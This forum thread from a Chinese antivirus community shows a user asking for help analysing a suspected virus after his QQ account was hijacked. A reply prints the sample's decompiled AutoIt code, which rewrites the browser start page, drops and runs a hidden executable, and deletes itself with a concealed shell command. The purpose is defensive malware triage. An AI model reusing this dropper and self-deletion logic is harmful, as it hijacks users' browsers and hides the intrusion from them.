[紧急]请各位大虾帮我分析一下此病毒的作用 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛 [紧急]请各位大虾帮我分析一下此病毒的作用

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] [紧急]请各位大虾帮我分析一下此病毒的作用

UFO不幸外人特邀体验者帖子:2592 注册: 2006-11-26 来自:火星	发表于： 2009-11-29 10:30 \| 只看楼主短消息资料字号：小中大 1楼 [紧急]请各位大虾帮我分析一下此病毒的作用前两天QQ突然被异地登录，感觉机器不太正常，直到今天才突然发现此文件，瑞星检查肯定为病毒（居然N天监控没有任何反应，导致我都不知道那天把它弄过来的）我特别想知道这个病毒到底做什么的？和我的QQ被盗是否存在关系，还有是否可以盗取其他密码。真的很着急，我的很多密码都很重要，比如支付宝。。。急急急用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; TencentTraveler 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2) 附件: 文件名:$R7FYJCD.rar 下载次数:174 文件类型:application/octet-stream 文件大小: 上传时间:2009-11-29 10:29:40 描述:rar 如果有病毒问题，请大家与我联系邮箱是1987noodle0158@sina.com 我的博客是http://blog.sina.com.cn/ufovirus
UFO不幸外人特邀体验者帖子:2592 注册: 2006-11-26 来自:火星	分享到：

sinoer 横据古稀狮帖子:12382 注册: 2008-09-23 来自:	发表于： 2009-11-29 10:33 \| 短消息资料字号：小中大 2楼回复：[紧急]请各位大虾帮我分析一下此病毒的作用建议把病毒样本发给瑞星，地址为：http://mailcenter.rising.com.cn/FileCheck/ 提交后，可自行查询处理进度。一颗红心向党，一片真心为民
sinoer 横据古稀狮帖子:12382 注册: 2008-09-23 来自:

UFO不幸外人特邀体验者帖子:2592 注册: 2006-11-26 来自:火星	发表于： 2009-11-29 10:37 \| 只看楼主短消息资料字号：小中大 3楼回复：[紧急]请各位大虾帮我分析一下此病毒的作用我的问题是瑞星解决不了的。瑞星工程师无法告知我这个东西的功能是什么。我自己的测试显示是流氓软件。但是不知道和我QQ盗取有什么联系？ HKEY_USERS\S-1-5-21-1993962763-220523388-839522115-1003\Software\Microsoft\Internet Explorer\Main\Start Page: "about:blank" HKEY_USERS\S-1-5-21-1993962763-220523388-839522115-1003\Software\Microsoft\Internet Explorer\Main\Start Page: "http://www.999w.com/" ---------------------------------- 添加文件:3 ---------------------------------- D:\Favorites\华人用得最多的网址导航.lnk D:\Favorites\百度一下.lnk D:\Favorites\青苹果家园.lnk ---------------------------------- 删除文件:1 ---------------------------------- C:\Documents and Settings\ufo\桌面\$R7FYJCD.exe 如果有病毒问题，请大家与我联系邮箱是1987noodle0158@sina.com 我的博客是http://blog.sina.com.cn/ufovirus
UFO不幸外人特邀体验者帖子:2592 注册: 2006-11-26 来自:火星

newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	发表于： 2009-11-29 10:39 \| 短消息资料字号：小中大 4楼回复：[紧急]请各位大虾帮我分析一下此病毒的作用 autoit 编写的病毒 REGWRITE ( "HKCU\Software\Microsoft\Internet Explorer\Main" , "Start Page" , "REG_SZ" , "http://www.999w.com/" ) FILEINSTALL ( "M:\Favorites.exe" , @HOMEDRIVE & "\Favorites.exe" , 1 ) RUNWAIT ( @HOMEDRIVE & "\Favorites.exe" ) FILEDELETE ( @HOMEDRIVE & "\Favorites.exe" ) REGDELETE ( "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" , "one" ) RUN ( @COMSPEC & " /c ping 127.0.0.1 -n 3&del /q "" & @SCRIPTFULLPATH & """ , @SCRIPTDIR , @SW_HIDE ) 没有盗号功能基本上只是设置主页的功能
newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:

UFO不幸外人特邀体验者帖子:2592 注册: 2006-11-26 来自:火星	发表于： 2009-11-29 10:47 \| 只看楼主短消息资料字号：小中大 5楼回复: [紧急]请各位大虾帮我分析一下此病毒的作用引用: 原帖由 newcenturymoon 于 2009-11-29 10:39:00 发表 autoit 编写的病毒 REGWRITE ( "HKCU\Software\Microsoft\Internet Explorer\Main" , "Start Page" , "REG_SZ" , "http://www.999w.com/" ) FILEINSTALL ( "M:\Fav...... 谢谢了，向阳光学习。我继续检查我电脑的其他问题。如果有病毒问题，请大家与我联系邮箱是1987noodle0158@sina.com 我的博客是http://blog.sina.com.cn/ufovirus
UFO不幸外人特邀体验者帖子:2592 注册: 2006-11-26 来自:火星

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT